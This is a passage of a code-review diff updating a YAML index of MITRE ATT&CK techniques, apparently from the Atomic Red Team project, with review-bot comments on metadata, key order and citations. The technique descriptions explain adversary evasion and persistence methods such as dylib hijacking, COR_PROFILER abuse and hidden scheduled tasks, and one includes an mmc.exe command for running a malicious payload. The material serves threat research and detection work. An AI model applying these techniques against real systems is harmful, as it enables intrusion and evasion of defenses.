command to create a new VM disk from a snapshot.(Citation: Cloud Audit Logs) It is also possible to detect the usage of the GCP API with the "sourceSnapshot":
parameter pointed to "global/snapshots/[BOOT_SNAPSHOT_NAME]
.(Citation: GCP - Creating and Starting a VM)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Snapshot: Snapshot Creation'
- 'Snapshot: Snapshot Metadata'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1
+ created: '2020-06-09T15:33:13.563Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1578/001
+ external_id: T1578.001
+ - source_name: AWS Cloud Trail Backup API
+ description: Amazon. (2020). Logging AWS Backup API Calls with AWS CloudTrail.
+ Retrieved April 27, 2020.
+ url: https://docs.aws.amazon.com/aws-backup/latest/devguide/logging-using-cloudtrail.html
+ - source_name: GCP - Creating and Starting a VM
+ description: Google. (2020, April 23). Creating and Starting a VM instance.
+ Retrieved May 1, 2020.
+ url: https://cloud.google.com/compute/docs/instances/create-start-instance#api_2
+ - source_name: Cloud Audit Logs
+ description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+ url: https://cloud.google.com/logging/docs/audit#admin-activity
+ - source_name: Mandiant M-Trends 2020
+ description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+ 2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+ - source_name: Azure - Monitor Logs
+ description: Microsoft. (2019, June 4). Monitor at scale by using Azure Monitor.
+ Retrieved May 1, 2020.
+ url: https://docs.microsoft.com/en-us/azure/backup/backup-azure-monitoring-use-azuremonitor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
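Review bot: `x_mitre_permissions_required: [User]` is removed from T1578.001 with no replacement anywhere in its hunks, while T1055.015 and T1564.001 in this same diff keep theirs. If upstream has dropped the field for this object that is fine, but it is a content change buried inside a reorder hunk and belongs in the PR description, since anything that filters techniques by required permissions will now treat T1578.001 as unknown. Separately, the Mandiant M-Trends reference changes its URL from content.fireeye.com to a mandiant.com PDF path but keeps "Retrieved April 24, 2020", whereas the harmj0y and Microsoft File Streams references elsewhere in this diff update the retrieved date together with the URL; either the date should be refreshed here too or the link should be confirmed to still resolve.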
@@ -13763,6 +14048,7 @@ defense-evasion:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -13773,13 +14059,12 @@ defense-evasion:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -13838,11 +14123,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -13882,8 +14166,10 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
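Review bot: `x_mitre_attack_spec_version: 3.2.0` is inserted between `kill_chain_phases` and `x_mitre_contributors` here, `x_mitre_modified_by_ref` goes after `x_mitre_is_subtechnique` in the next hunk, and both keys are then removed from the tail of the object further down. For every other technique in this diff (T1055.015, T1220, T1578.001) those two keys are emitted after `object_marking_refs`, so T1078.004 ends up with a different key order from its neighbours. That points at the generator not normalising key order, which will keep producing spurious diffs on every regeneration; sort keys (or emit them in one fixed order) before the dump.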
@@ -13891,13 +14177,13 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
@@ -13928,9 +14214,6 @@ defense-evasion:
url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.004
atomic_tests: []
T1480.001:
@@ -13991,7 +14274,7 @@ defense-evasion:
Similar to [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027), adversaries may use environmental keying to help protect their TTPs and evade detection. Environmental keying may be used to deliver an encrypted payload to the target that will use target-specific values to decrypt the payload before execution.(Citation: Kaspersky Gauss Whitepaper)(Citation: EK Impeding Malware Analysis)(Citation: Environmental Keyed HTA)(Citation: Ebowla: Genetic Malware)(Citation: Demiguise Guardrail Router Logo) By utilizing target-specific values to decrypt the payload the adversary can avoid packaging the decryption key with the payload or sending it over a potentially monitored network connection. Depending on the technique for gathering target-specific values, reverse engineering of the encrypted payload can be exceptionally difficult.(Citation: Kaspersky Gauss Whitepaper) This can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within.
Like other [Execution Guardrails](https://attack.mitre.org/techniques/T1480), environmental keying can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This activity is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of environmental keying will involve checking for an expected target-specific value that must match for decryption and subsequent execution to be successful.
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-04T14:52:51.290Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Environmental Keying
x_mitre_detection: Detecting the use of environmental keying may be difficult
@@ -14013,11 +14296,10 @@ defense-evasion:
- Static File Analysis
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.004:
technique:
- modified: '2024-02-14T21:56:34.831Z'
+ modified: '2024-09-12T15:27:29.615Z'
name: 'Hide Artifacts: NTFS File Attributes'
description: |-
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. (Citation: SpectorOps Host-Based Jul 2017) Within MFT entries are file attributes, (Citation: Microsoft NTFS File Attributes Aug 2010) such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files). (Citation: SpectorOps Host-Based Jul 2017) (Citation: Microsoft File Streams) (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
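Review bot: T1480.001 keeps `x_mitre_attack_spec_version: 2.1.0` (the context line just above the removed `spec_version`) and its `modified` moves backwards to 2022-05-04 in the previous hunk, while T1564.004 immediately below is on 3.2.0 with a 2024 `modified`. The 3.2.0 objects in this diff all carry `revoked: false` and `x_mitre_deprecated: false`; check whether the objects left on 2.1.0 (T1055.008, T1027.007, T1480.001) do, because consumers cannot otherwise rely on those fields being present across the index. The PR description should say which ATT&CK bundle the 2.1.0 objects come from and why they were not refreshed alongside the rest.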
@@ -14084,8 +14366,8 @@ defense-evasion:
Retrieved March 21, 2018.
url: https://blogs.technet.microsoft.com/askcore/2013/03/24/alternate-data-streams-in-ntfs/
- source_name: Microsoft File Streams
- description: Microsoft. (n.d.). File Streams. Retrieved December 2, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa364404
+ description: Microsoft. (n.d.). File Streams. Retrieved September 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/fileio/file-streams
- source_name: Oddvar Moe ADS2 Apr 2018
description: Moe, O. (2018, April 11). Putting Data in Alternate Data Streams
and How to Execute It - Part 2. Retrieved June 30, 2018.
@@ -14103,7 +14385,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.004
atomic_tests: []
T1055.001:
@@ -14206,12 +14487,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.001
atomic_tests: []
T1556:
technique:
- modified: '2024-04-11T21:51:44.851Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Modify Authentication Process
description: |-
Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://attack.mitre.org/techniques/T1078).
@@ -14224,6 +14504,7 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Chris Ross @xorrior
x_mitre_deprecated: false
@@ -14260,17 +14541,17 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- Linux
- macOS
- Network
- - Azure AD
- - Google Workspace
- IaaS
- - Office 365
- SaaS
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Process: Process Access'
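Review bot: The platform list change here (`Azure AD`, `Google Workspace`, `Office 365` removed; `Office Suite`, `Identity Provider` added) is a rename, not a narrowing of scope, and anything that filters or builds per-platform indexes on the old names will silently match nothing after this lands. Check that platform-keyed index generation is updated in the same change, and note that the `x_mitre_version` bump 2.4 → 2.5 is consistent with this being an upstream content revision rather than a local edit.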
@@ -14316,9 +14597,6 @@ defense-evasion:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1216:
technique:
@@ -14356,7 +14634,7 @@ defense-evasion:
behavior may be abused by adversaries to execute malicious files that could
bypass application control and signature validation on systems.(Citation:
GitHub Ultimate AppLocker Bypass List)'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:43:46.045Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Signed Script Proxy Execution
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -14375,7 +14653,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216
atomic_tests: []
T1556.004:
@@ -14406,7 +14683,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -14430,12 +14707,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
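Review bot: At the top of this hunk (T1556.004) `x_mitre_attack_spec_version: 2.1.0` is removed together with `spec_version` and nothing is added in its place, whereas for T1556 above the key is relocated rather than dropped. Please confirm the regenerated object still carries `x_mitre_attack_spec_version` somewhere outside this hunk's context; without it consumers cannot tell which ATT&CK spec the object follows.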
@@ -14519,7 +14794,6 @@ defense-evasion:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1601.002:
technique:
@@ -14541,7 +14815,7 @@ defense-evasion:
url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco
IOS devices. Retrieved October 19, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T17:49:02.660Z'
name: Downgrade System Image
description: "Adversaries may install an older version of the operating system
of a network device to weaken security. Older operating system versions on
@@ -14575,12 +14849,10 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -14632,9 +14904,8 @@ defense-evasion:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1211:
@@ -14703,7 +14974,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1127:
technique:
@@ -14750,7 +15020,7 @@ defense-evasion:
legitimate certificates that allow them to execute on a system and proxy execution
of malicious code through a trusted process that effectively bypasses application
control solutions.'
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-05-05T05:00:37.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Trusted Developer Utilities Proxy Execution
x_mitre_detection: |-
@@ -14763,12 +15033,13 @@ defense-evasion:
x_mitre_is_subtechnique: false
x_mitre_data_sources:
- 'Command: Command Execution'
+ - 'Module: Module Load'
+ - 'Process: Process Metadata'
- 'Process: Process Creation'
x_mitre_defense_bypassed:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1127
atomic_tests: []
T1218.014:
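Review bot: The two data sources added to T1127 here (`Module: Module Load`, `Process: Process Metadata`) are a content change, yet the same object's `modified` timestamp in the preceding hunk moves earlier (2022-05-24 → 2022-05-05). Content growing while the timestamp regresses points to the regeneration reading a different upstream snapshot rather than a strictly newer one; worth verifying the source bundle before merging so detection content keyed on these data sources is not built on a mixed baseline.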
@@ -14847,7 +15118,7 @@ defense-evasion:
mmc_vulns) Once the .msc file is saved, adversaries may invoke the malicious
CLSID payload with the following command: mmc.exe -Embedding C:\\path\\to\\test.msc
.(Citation:
abusing_com_reg)"
- modified: '2022-10-25T14:00:00.188Z'
+ modified: '2022-05-20T17:41:16.112Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: MMC
x_mitre_detection: "Monitor processes and command-line parameters for suspicious
@@ -14869,7 +15140,6 @@ defense-evasion:
- Digital Certificate Validation
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564.010:
technique:
@@ -14912,7 +15182,7 @@ defense-evasion:
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-11-29T15:56:50.370Z'
name: Process Argument Spoofing
description: |-
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
@@ -14936,8 +15206,6 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.012:
technique:
@@ -14985,7 +15253,7 @@ defense-evasion:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -15023,8 +15291,6 @@ defense-evasion:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
privilege-escalation:
@@ -15073,7 +15339,7 @@ privilege-escalation:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -15125,29 +15391,28 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests: []
T1053.005:
technique:
- modified: '2023-11-15T14:33:53.354Z'
+ modified: '2024-10-13T16:13:47.770Z'
name: 'Scheduled Task/Job: Scheduled Task'
description: "Adversaries may abuse the Windows Task Scheduler to perform task
scheduling for initial or recurring execution of malicious code. There are
multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
utility can be run directly on the command line, or the Task Scheduler can
be opened through the GUI within the Administrator Tools section of the Control
- Panel. In some cases, adversaries have used a .NET wrapper for the Windows
- Task Scheduler, and alternatively, adversaries have used the Windows netapi32
- library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
- utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
- though at.exe
can not access tasks created with schtasks
- or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
- programs at system startup or on a scheduled basis for persistence. The Windows
- Task Scheduler can also be abused to conduct remote Execution as part of Lateral
- Movement and/or to run a process under the context of a specified account
- (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+ Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+ wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+ used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+ (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+ Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+ create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+ Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+ system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+ can also be abused to conduct remote Execution as part of Lateral Movement
+ and/or to run a process under the context of a specified account (such as
+ SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
adversaries have also abused the Windows Task Scheduler to potentially mask
one-time execution under signed/trusted system processes.(Citation: ProofPoint
Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -15194,7 +15459,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.5'
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'File: File Modification'
@@ -15226,8 +15491,8 @@ privilege-escalation:
url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
- source_name: Twitter Leoloobeek Scheduled Task
description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
- December 12, 2017.
- url: https://twitter.com/leoloobeek/status/939248813465853953
+ September 12, 2024.
+ url: https://x.com/leoloobeek/status/939248813465853953
- source_name: Tarrask scheduled task
description: Microsoft Threat Intelligence Team & Detection and Response Team
. (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
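Review bot: The citation update here swaps `twitter.com` for `x.com` and bumps the retrieved date to 2024 for a tweet from 2017; the referenced content is unchanged, so the new date only records when the link was re-checked. Given that other references in this diff already point at `web.archive.org` snapshots, an archived copy would be the more durable target for a social-media citation, though that is an upstream ATT&CK choice rather than something to change in this sync.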
@@ -15241,6 +15506,10 @@ privilege-escalation:
description: Microsoft. (n.d.). General Task Registration. Retrieved December
12, 2017.
url: https://technet.microsoft.com/library/dd315590.aspx
+ - source_name: Red Canary - Atomic Red Team
+ description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+ Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+ url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
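Review bot: The new `Red Canary - Atomic Red Team` reference added in this hunk points back at this repository's own `atomics/T1053.005/T1053.005.md`, so from this repo's perspective the description now cites itself; it also links the `master` branch, which is not a stable reference. Nothing to change in the sync itself, but it is worth noting in the PR description so nobody later treats that reference as independent corroboration of the `Invoke-CimMethod` / `PS_ScheduledTask` statement, and a commit permalink would be preferable if the upstream reference is ever revised.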
@@ -15253,11 +15522,14 @@ privilege-escalation:
description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
Task - Registry. Retrieved June 1, 2022.
url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+ - source_name: Stack Overflow
+ description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+ Tasks folder. Retrieved June 19, 2024.
+ url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.005
atomic_tests: []
T1037:
@@ -15323,7 +15595,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15412,7 +15683,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15500,7 +15770,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15585,7 +15854,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15617,7 +15885,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
@@ -15640,11 +15908,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15702,14 +15969,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
